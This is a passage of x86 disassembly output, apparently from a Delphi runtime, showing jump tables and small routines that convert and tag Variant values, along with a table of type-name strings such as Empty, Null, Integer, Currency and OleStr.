loc_40011ED8: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
lea edx, [ebp+var_8] ; jumptable 40011E2E case 3
mov eax, [ebx+8]
call sub_40007C98
mov edx, [ebp+var_8]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011EF2: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
fld dword ptr [ebx+8] ; jumptable 40011E2E case 4
add esp, 0FFFFFFF4h
fstp [esp+90h+var_90]
wait
lea eax, [ebp+var_C]
call sub_40008E14
mov edx, [ebp+var_C]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011F13: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
fld qword ptr [ebx+8] ; jumptable 40011E2E case 5
add esp, 0FFFFFFF4h
fstp [esp+90h+var_90]
wait
lea eax, [ebp+var_10]
call sub_40008E14
mov edx, [ebp+var_10]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011F34: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
push dword ptr [ebx+0Ch] ; jumptable 40011E2E case 6
push dword ptr [ebx+8]
lea eax, [ebp+var_14]
call sub_400113EC
mov edx, [ebp+var_14]
mov eax, esi
call sub_40005044
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011F51: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
push dword ptr [ebx+0Ch] ; jumptable 40011E2E case 7
push dword ptr [ebx+8]
lea eax, [ebp+var_18]
call sub_40011424
mov edx, [ebp+var_18]
mov eax, esi
call sub_40005044
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011F6E: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
push esi ; jumptable 40011E2E case 8
mov eax, [ebx+8]
mov ecx, 7FFFFFFFh
mov edx, 1
call sub_40005174
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011F86: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
lea edx, [ebp+var_1C] ; jumptable 40011E2E case 11
movzx eax, word ptr [ebx+8]
call sub_4001145C
mov edx, [ebp+var_1C]
mov eax, esi
call sub_40005044
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011FA1: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
lea edx, [ebp+var_20] ; jumptable 40011E2E case 16
movsx eax, byte ptr [ebx+8]
call sub_40007C98
mov edx, [ebp+var_20]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011FBC: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
lea edx, [ebp+var_24] ; jumptable 40011E2E case 17
movzx eax, byte ptr [ebx+8]
call sub_40007C98
mov edx, [ebp+var_24]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011FD7: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
lea edx, [ebp+var_28] ; jumptable 40011E2E case 18
movzx eax, word ptr [ebx+8]
call sub_40007C98
mov edx, [ebp+var_28]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40011FF2: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
mov eax, [ebx+8] ; jumptable 40011E2E case 19
xor edx, edx
push edx
push eax
lea eax, [ebp+var_2C]
call sub_40007D84
mov edx, [ebp+var_2C]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40012010: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
push dword ptr [ebx+0Ch] ; jumptable 40011E2E case 20
push dword ptr [ebx+8]
lea eax, [ebp+var_30]
call sub_40007D84
mov edx, [ebp+var_30]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_4001202D: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
mov eax, [ebx+8] ; jumptable 40011E2E case 12
mov edx, eax
mov eax, esi
call sub_40011DFC
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_4001203E: ; CODE XREF: sub_40011DFC+32�j
; DATA XREF: sub_40011DFC:off_40011E35�o
lea edx, [ebp+var_34] ; jumptable 40011E2E cases 9,13
mov eax, ebx
call sub_40011C18
mov edx, [ebp+var_34]
mov eax, esi
call sub_40005044
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40012057: ; CODE XREF: sub_40011DFC+2C�j
; sub_40011DFC+32�j
; DATA XREF: ...
mov edx, eax ; default
; jumptable 40011E2E cases 10,14,15
sub dx, 100h
jz short loc_40012067
dec dx
jz short loc_40012076
jmp short loc_4001208F
; ---------------------------------------------------------------------------
loc_40012067: ; CODE XREF: sub_40011DFC+262�j
mov eax, esi
mov edx, [ebx+8]
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40012076: ; CODE XREF: sub_40011DFC+267�j
lea edx, [ebp+var_38]
mov eax, ebx
call sub_40011CD0
mov edx, [ebp+var_38]
mov eax, esi
call sub_40005044
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_4001208F: ; CODE XREF: sub_40011DFC+269�j
test ah, 40h
jz loc_400122A3
movzx eax, ax
and eax, 0FFFFBFFFh
cmp eax, 14h ; switch 21 cases
ja loc_4001228D ; default
; jumptable 400120A9 cases 0,1,9,10,13-15
jmp ds:off_400120B0[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_400120B0 dd offset loc_4001228D ; DATA XREF: sub_40011DFC+2AD�r
dd offset loc_4001228D ; jump table for switch statement
dd offset loc_40012104
dd offset loc_40012121
dd offset loc_4001213D
dd offset loc_40012160
dd offset loc_40012183
dd offset loc_400121A2
dd offset loc_400121C1
dd offset loc_4001228D
dd offset loc_4001228D
dd offset loc_400121D2
dd offset loc_4001227F
dd offset loc_4001228D
dd offset loc_4001228D
dd offset loc_4001228D
dd offset loc_400121EF
dd offset loc_4001220C
dd offset loc_40012229
dd offset loc_40012246
dd offset loc_40012263
; ---------------------------------------------------------------------------
loc_40012104: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
lea edx, [ebp+var_3C] ; jumptable 400120A9 case 2
mov eax, [ebx+8]
movsx eax, word ptr [eax]
call sub_40007C98
mov edx, [ebp+var_3C]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40012121: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
lea edx, [ebp+var_40] ; jumptable 400120A9 case 3
mov eax, [ebx+8]
mov eax, [eax]
call sub_40007C98
mov edx, [ebp+var_40]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_4001213D: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
mov eax, [ebx+8] ; jumptable 400120A9 case 4
fld dword ptr [eax]
add esp, 0FFFFFFF4h
fstp [esp+90h+var_90]
wait
lea eax, [ebp+var_44]
call sub_40008E14
mov edx, [ebp+var_44]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40012160: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
mov eax, [ebx+8] ; jumptable 400120A9 case 5
fld qword ptr [eax]
add esp, 0FFFFFFF4h
fstp [esp+90h+var_90]
wait
lea eax, [ebp+var_48]
call sub_40008E14
mov edx, [ebp+var_48]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40012183: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
mov eax, [ebx+8] ; jumptable 400120A9 case 6
push dword ptr [eax+4]
push dword ptr [eax]
lea eax, [ebp+var_4C]
call sub_400113EC
mov edx, [ebp+var_4C]
mov eax, esi
call sub_40005044
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_400121A2: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
mov eax, [ebx+8] ; jumptable 400120A9 case 7
push dword ptr [eax+4]
push dword ptr [eax]
lea eax, [ebp+var_50]
call sub_40011424
mov edx, [ebp+var_50]
mov eax, esi
call sub_40005044
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_400121C1: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
mov eax, esi ; jumptable 400120A9 case 8
mov edx, [ebx+8]
mov edx, [edx]
call sub_4000511C
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_400121D2: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
lea edx, [ebp+var_54] ; jumptable 400120A9 case 11
mov eax, [ebx+8]
movzx eax, word ptr [eax]
call sub_4001145C
mov edx, [ebp+var_54]
mov eax, esi
call sub_40005044
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_400121EF: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
lea edx, [ebp+var_58] ; jumptable 400120A9 case 16
mov eax, [ebx+8]
movsx eax, byte ptr [eax]
call sub_40007C98
mov edx, [ebp+var_58]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_4001220C: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
lea edx, [ebp+var_5C] ; jumptable 400120A9 case 17
mov eax, [ebx+8]
movzx eax, byte ptr [eax]
call sub_40007C98
mov edx, [ebp+var_5C]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40012229: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
lea edx, [ebp+var_60] ; jumptable 400120A9 case 18
mov eax, [ebx+8]
movzx eax, word ptr [eax]
call sub_40007C98
mov edx, [ebp+var_60]
mov eax, esi
call sub_40005158
jmp loc_400122CB
; ---------------------------------------------------------------------------
loc_40012246: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
mov eax, [ebx+8] ; jumptable 400120A9 case 19
mov eax, [eax]
xor edx, edx
push edx
push eax
lea eax, [ebp+var_64]
call sub_40007D84
mov edx, [ebp+var_64]
mov eax, esi
call sub_40005158
jmp short loc_400122CB
; ---------------------------------------------------------------------------
loc_40012263: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
mov eax, [ebx+8] ; jumptable 400120A9 case 20
push dword ptr [eax+4]
push dword ptr [eax]
lea eax, [ebp+var_68]
call sub_40007D84
mov edx, [ebp+var_68]
mov eax, esi
call sub_40005158
jmp short loc_400122CB
; ---------------------------------------------------------------------------
loc_4001227F: ; CODE XREF: sub_40011DFC+2AD�j
; DATA XREF: sub_40011DFC:off_400120B0�o
mov eax, [ebx+8] ; jumptable 400120A9 case 12
mov edx, eax
mov eax, esi
call sub_40011DFC
jmp short loc_400122CB
; ---------------------------------------------------------------------------
loc_4001228D: ; CODE XREF: sub_40011DFC+2A7�j
; sub_40011DFC+2AD�j
; DATA XREF: ...
lea edx, [ebp+var_6C] ; default
; jumptable 400120A9 cases 0,1,9,10,13-15
mov eax, ebx
call sub_40011C18
mov edx, [ebp+var_6C]
mov eax, esi
call sub_40005044
jmp short loc_400122CB
; ---------------------------------------------------------------------------
loc_400122A3: ; CODE XREF: sub_40011DFC+296�j
mov eax, esi
call sub_40005008
mov edx, eax
mov eax, ebx
call sub_40011D34
test al, al
jnz short loc_400122CB
lea edx, [ebp+var_70]
mov eax, ebx
call sub_40011C18
mov edx, [ebp+var_70]
mov eax, esi
call sub_40005044
loc_400122CB: ; CODE XREF: sub_40011DFC+94�j
; sub_40011DFC+BC�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40012348
loc_400122D8: ; CODE XREF: sub_40011DFC+54A�j
lea eax, [ebp+var_70]
mov edx, 2
call sub_40005020
lea eax, [ebp+var_68]
mov edx, 5
call sub_400048A8
lea eax, [ebp+var_54]
mov edx, 3
call sub_40005020
lea eax, [ebp+var_48]
mov edx, 4
call sub_400048A8
lea eax, [ebp+var_38]
mov edx, 2
call sub_40005020
lea eax, [ebp+var_30]
mov edx, 5
call sub_400048A8
lea eax, [ebp+var_1C]
mov edx, 3
call sub_40005020
lea eax, [ebp+var_10]
mov edx, 4
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_40012341: ; DATA XREF: sub_40011DFC+18�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400122D8
; ---------------------------------------------------------------------------
loc_40012348: ; CODE XREF: sub_40011DFC+544�j
; DATA XREF: sub_40011DFC+4D7�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40011DFC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012350 proc near ; CODE XREF: sub_400123C8+7A�p
var_10 = word ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
mov esi, edx
mov ebx, eax
lea eax, [ebp+var_10]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_400123BA
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, esi
lea eax, [ebp+var_10]
call sub_4000E700
lea eax, [ebp+var_10]
call ds:off_4001F29C
cmp [ebp+var_10], 0Dh
jz short loc_4001239A
mov dx, 0Dh
mov ax, 101h
call sub_4000DBF4
loc_4001239A: ; CODE XREF: sub_40012350+3B�j
mov eax, ebx
mov edx, [ebp+var_8]
call sub_4000621C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400123C1
loc_400123B1: ; CODE XREF: sub_40012350+6F�j
lea eax, [ebp+var_10]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_400123BA: ; DATA XREF: sub_40012350+18�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400123B1
; ---------------------------------------------------------------------------
loc_400123C1: ; CODE XREF: sub_40012350+69�j
; DATA XREF: sub_40012350+5C�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40012350 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400123C8 proc near ; CODE XREF: sub_4000E894+19�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov ebx, edx
mov esi, eax
movzx eax, word ptr [ebx]
cmp eax, 0Dh
jg short loc_400123E7
jz short loc_40012424
sub eax, 1
jb short loc_400123FC
jz short loc_40012405
sub eax, 8
jz short loc_40012424
jmp short loc_40012449
; ---------------------------------------------------------------------------
loc_400123E7: ; CODE XREF: sub_400123C8+D�j
sub eax, 101h
jz short loc_4001243E
sub eax, 3F08h
jz short loc_40012430
sub eax, 4
jz short loc_40012430
jmp short loc_40012449
; ---------------------------------------------------------------------------
loc_400123FC: ; CODE XREF: sub_400123C8+14�j
mov eax, esi
call sub_40006204
jmp short loc_4001247D
; ---------------------------------------------------------------------------
loc_40012405: ; CODE XREF: sub_400123C8+16�j
cmp byte_4001AA10, 0
jz short loc_4001241B
mov dx, 0Dh
mov ax, 1
call sub_4000DBF4
loc_4001241B: ; CODE XREF: sub_400123C8+44�j
mov eax, esi
call sub_40006204
jmp short loc_4001247D
; ---------------------------------------------------------------------------
loc_40012424: ; CODE XREF: sub_400123C8+F�j
; sub_400123C8+1B�j
mov eax, esi
mov edx, [ebx+8]
call sub_4000621C
jmp short loc_4001247D
; ---------------------------------------------------------------------------
loc_40012430: ; CODE XREF: sub_400123C8+2B�j
; sub_400123C8+30�j
mov eax, esi
mov edx, [ebx+8]
mov edx, [edx]
call sub_4000621C
jmp short loc_4001247D
; ---------------------------------------------------------------------------
loc_4001243E: ; CODE XREF: sub_400123C8+24�j
mov edx, ebx
mov eax, esi
call sub_40012350
jmp short loc_4001247D
; ---------------------------------------------------------------------------
loc_40012449: ; CODE XREF: sub_400123C8+1D�j
; sub_400123C8+32�j
mov edx, esp
movzx eax, word ptr [ebx]
call sub_40012D98
test al, al
jz short loc_40012471
mov eax, esi
call sub_40006204
mov ecx, eax
mov edx, offset dword_40012484
mov eax, [esp+0Ch+var_C]
call sub_40003D9C
test al, al
jnz short loc_4001247D
loc_40012471: ; CODE XREF: sub_400123C8+8D�j
movzx eax, word ptr [ebx]
mov dx, 0Dh
call sub_4000DBF4
loc_4001247D: ; CODE XREF: sub_400123C8+3B�j
; sub_400123C8+5A�j ...
pop edx
pop esi
pop ebx
retn
sub_400123C8 endp
; ---------------------------------------------------------------------------
align 4
dword_40012484 dd 2 dup(0) dd 0C0h, 46000000h
; =============== S U B R O U T I N E =======================================
sub_40012494 proc near ; CODE XREF: sub_4000E848+19�p
var_C = dword ptr -0Ch
push ebx
push esi
push ecx
mov ebx, edx
mov esi, eax
movzx eax, word ptr [ebx]
sub ax, 1
jb short loc_400124B4
jz short loc_400124BD
sub ax, 8
jz short loc_400124DC
sub ax, 4000h
jz short loc_400124E8
jmp short loc_400124F6
; ---------------------------------------------------------------------------
loc_400124B4: ; CODE XREF: sub_40012494+E�j
mov eax, esi
call sub_40006204
jmp short loc_4001252A
; ---------------------------------------------------------------------------
loc_400124BD: ; CODE XREF: sub_40012494+10�j
cmp byte_4001AA10, 0
jz short loc_400124D3
mov dx, 9
mov ax, 1
call sub_4000DBF4
loc_400124D3: ; CODE XREF: sub_40012494+30�j
mov eax, esi
call sub_40006204
jmp short loc_4001252A
; ---------------------------------------------------------------------------
loc_400124DC: ; CODE XREF: sub_40012494+16�j
mov eax, esi
mov edx, [ebx+8]
call sub_4000621C
jmp short loc_4001252A
; ---------------------------------------------------------------------------
loc_400124E8: ; CODE XREF: sub_40012494+1C�j
mov eax, esi
mov edx, [ebx+8]
mov edx, [edx]
call sub_4000621C
jmp short loc_4001252A
; ---------------------------------------------------------------------------
loc_400124F6: ; CODE XREF: sub_40012494+1E�j
mov edx, esp
movzx eax, word ptr [ebx]
call sub_40012D98
test al, al
jz short loc_4001251E
mov eax, esi
call sub_40006204
mov ecx, eax
mov edx, offset dword_40012530
mov eax, [esp+0Ch+var_C]
call sub_40003D9C
test al, al
jnz short loc_4001252A
loc_4001251E: ; CODE XREF: sub_40012494+6E�j
movzx eax, word ptr [ebx]
mov dx, 9
call sub_4000DBF4
loc_4001252A: ; CODE XREF: sub_40012494+27�j
; sub_40012494+46�j ...
pop edx
pop esi
pop ebx
retn
sub_40012494 endp
; ---------------------------------------------------------------------------
align 10h
dword_40012530 dd 20400h, 0 dd 0C0h, 46000000h
; =============== S U B R O U T I N E =======================================
sub_40012540 proc near ; CODE XREF: sub_4000E9CC+F0�p
push ebx
push esi
mov esi, edx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_40012554
mov eax, ebx
call sub_4000E35C
loc_40012554: ; CODE XREF: sub_40012540+B�j
mov word ptr [ebx], 3
mov [ebx+8], esi
pop esi
pop ebx
retn
sub_40012540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40012560 proc near ; CODE XREF: sub_4000E9CC+1A5�p
push ebx
push esi
mov ebx, edx
mov esi, eax
test word ptr [esi], 0BFE8h
jz short loc_40012574
mov eax, esi
call sub_4000E35C
loc_40012574: ; CODE XREF: sub_40012560+B�j
mov word ptr [esi], 11h
mov [esi+8], bl
pop esi
pop ebx
retn
sub_40012560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40012580 proc near ; CODE XREF: sub_4000E9CC+1B7�p
push ebx
push esi
mov esi, edx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_40012594
mov eax, ebx
call sub_4000E35C
loc_40012594: ; CODE XREF: sub_40012580+B�j
mov word ptr [ebx], 12h
mov [ebx+8], si
pop esi
pop ebx
retn
sub_40012580 endp
; =============== S U B R O U T I N E =======================================
sub_400125A0 proc near ; CODE XREF: sub_4000E9CC+1C9�p
push ebx
push esi
mov esi, edx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_400125B4
mov eax, ebx
call sub_4000E35C
loc_400125B4: ; CODE XREF: sub_400125A0+B�j
mov word ptr [ebx], 13h
mov [ebx+8], esi
pop esi
pop ebx
retn
sub_400125A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400125C0 proc near ; CODE XREF: sub_4000E9CC+190�p
push ebx
push esi
mov ebx, edx
mov esi, eax
test word ptr [esi], 0BFE8h
jz short loc_400125D4
mov eax, esi
call sub_4000E35C
loc_400125D4: ; CODE XREF: sub_400125C0+B�j
mov word ptr [esi], 10h
mov [esi+8], bl
pop esi
pop ebx
retn
sub_400125C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400125E0 proc near ; CODE XREF: sub_4000E9CC+DB�p
push ebx
push esi
mov esi, edx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_400125F4
mov eax, ebx
call sub_4000E35C
loc_400125F4: ; CODE XREF: sub_400125E0+B�j
mov word ptr [ebx], 2
mov [ebx+8], si
pop esi
pop ebx
retn
sub_400125E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012600 proc near ; CODE XREF: sub_4000E9CC+1DB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_40012614
mov eax, ebx
call sub_4000E35C
loc_40012614: ; CODE XREF: sub_40012600+B�j
mov word ptr [ebx], 14h
mov eax, [ebp+arg_0]
mov [ebx+8], eax
mov eax, [ebp+arg_4]
mov [ebx+0Ch], eax
pop ebx
pop ebp
retn 8
sub_40012600 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4001262C proc near ; CODE XREF: sub_4000E9CC+10A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_40012640
mov eax, ebx
call sub_4000E35C
loc_40012640: ; CODE XREF: sub_4001262C+B�j
mov eax, [ebp+arg_0]
mov [ebx+8], eax
mov word ptr [ebx], 4
pop ebx
pop ebp
retn 4
sub_4001262C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012650 proc near ; CODE XREF: sub_4000E9CC+124�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_40012664
mov eax, ebx
call sub_4000E35C
loc_40012664: ; CODE XREF: sub_40012650+B�j
mov eax, [ebp+arg_0]
mov [ebx+8], eax
mov eax, [ebp+arg_4]
mov [ebx+0Ch], eax
mov word ptr [ebx], 5
pop ebx
pop ebp
retn 8
sub_40012650 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4001267C proc near ; CODE XREF: sub_4000E9CC+13E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_40012690
mov eax, ebx
call sub_4000E35C
loc_40012690: ; CODE XREF: sub_4001267C+B�j
mov eax, [ebp+arg_0]
mov [ebx+8], eax
mov eax, [ebp+arg_4]
mov [ebx+0Ch], eax
mov word ptr [ebx], 6
pop ebx
pop ebp
retn 8
sub_4001267C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400126A8 proc near ; CODE XREF: sub_4000E9CC+158�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_400126BC
mov eax, ebx
call sub_4000E35C
loc_400126BC: ; CODE XREF: sub_400126A8+B�j
mov eax, [ebp+arg_0]
mov [ebx+8], eax
mov eax, [ebp+arg_4]
mov [ebx+0Ch], eax
mov word ptr [ebx], 7
pop ebx
pop ebp
retn 8
sub_400126A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400126D4 proc near ; CODE XREF: sub_4000E9CC+17B�p
push ebx
push esi
mov ebx, edx
mov esi, eax
test word ptr [esi], 0BFE8h
jz short loc_400126E8
mov eax, esi
call sub_4000E35C
loc_400126E8: ; CODE XREF: sub_400126D4+B�j
mov word ptr [esi], 0Bh
cmp bl, 1
cmc
sbb eax, eax
mov [esi+8], ax
pop esi
pop ebx
retn
sub_400126D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400126FC proc near ; CODE XREF: sub_4000E7FC+23�p
push ebx
push esi
mov esi, edx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_40012710
mov eax, ebx
call sub_4000E35C
loc_40012710: ; CODE XREF: sub_400126FC+B�j
xor eax, eax
mov [ebx+8], eax
mov word ptr [ebx], 100h
lea eax, [ebx+8]
mov edx, esi
call sub_400048D8
pop esi
pop ebx
retn
sub_400126FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40012728 proc near ; CODE XREF: sub_4000E7B0+23�p
push ebx
push esi
mov esi, edx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_4001273C
mov eax, ebx
call sub_4000E35C
loc_4001273C: ; CODE XREF: sub_40012728+B�j
xor eax, eax
mov [ebx+8], eax
mov word ptr [ebx], 8
lea eax, [ebx+8]
push eax
mov ecx, 7FFFFFFFh
mov edx, 1
mov eax, esi
call sub_40005174
pop esi
pop ebx
retn
sub_40012728 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40012760 proc near ; CODE XREF: sub_4000E894+23�p
push ebx
push esi
mov esi, edx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_40012774
mov eax, ebx
call sub_4000E35C
loc_40012774: ; CODE XREF: sub_40012760+B�j
xor eax, eax
mov [ebx+8], eax
mov word ptr [ebx], 0Dh
lea eax, [ebx+8]
mov edx, esi
call sub_4000621C
pop esi
pop ebx
retn
sub_40012760 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4001278C proc near ; CODE XREF: sub_4000E848+23�p
push ebx
push esi
mov esi, edx
mov ebx, eax
test word ptr [ebx], 0BFE8h
jz short loc_400127A0
mov eax, ebx
call sub_4000E35C
loc_400127A0: ; CODE XREF: sub_4001278C+B�j
xor eax, eax
mov [ebx+8], eax
mov word ptr [ebx], 9
lea eax, [ebx+8]
mov edx, esi
call sub_4000621C
pop esi
pop ebx
retn
sub_4001278C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400127B8 proc near ; DATA XREF: sub_40019144+55�o
; .data:off_4001A014�o
cmp word ptr [eax], 8
jb short locret_400127D8
push dword ptr [eax+0Ch]
push dword ptr [eax+8]
push dword ptr [eax+4]
push dword ptr [eax]
mov word ptr [eax], 0
mov edx, esp
call sub_4000E700
add esp, 10h
locret_400127D8: ; CODE XREF: sub_400127B8+4�j
retn
sub_400127B8 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 5
aEmpty db 'Empty',0 ; DATA XREF: .data:off_4001AA20�o
align 4
dword_400127EC dd 0FFFFFFFFh, 4, 6C6C754Eh, 0dword_400127FC dd 0FFFFFFFFh, 8, 6C616D53h, 746E696Ch, 0dword_40012810 dd 0FFFFFFFFh, 7, 65746E49h, 726567h, 0FFFFFFFFh, 6, 676E6953h
; DATA XREF: .data:4001AA2C�o
dd 656Ch, 0FFFFFFFFh, 6, 62756F44h, 656Ch, 0FFFFFFFFh
dd 8, 72727543h, 79636E65h, 0
dword_40012854 dd 0FFFFFFFFh, 4, 65746144h, 0dword_40012864 dd 0FFFFFFFFh, 6, 53656C4Fh, 7274h, 0FFFFFFFFh, 8, 70736944h
; DATA XREF: .data:4001AA40�o
dd 68637461h, 0
dword_40012888 dd 0FFFFFFFFh, 5, 6F727245h, 72h, 0FFFFFFFFh, 7, 6C6F6F42h
; DATA XREF: .data:4001AA48�o
dd 6E6165h, 0FFFFFFFFh, 7, 69726156h, 746E61h, 0FFFFFFFFh
dd 7, 6E6B6E55h, 6E776Fh, 0FFFFFFFFh, 7, 69636544h, 6C616Dh
dd 0FFFFFFFFh, 3, 463024h, 0FFFFFFFFh, 8, 726F6853h, 746E4974h
dd 0
dword_400128F8 dd 0FFFFFFFFh, 4, 65747942h, 0dword_40012908 dd 0FFFFFFFFh, 4, 64726F57h, 0dword_40012918 dd 0FFFFFFFFh, 8, 676E6F4Ch, 64726F57h, 0dword_4001292C dd 0FFFFFFFFh, 5, 36746E49h, 34h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4001293C proc near ; CODE XREF: sub_4000DBF4+2A�p
; sub_4000DBF4+3E�p ...
var_208 = dword ptr -208h
var_204 = byte ptr -204h
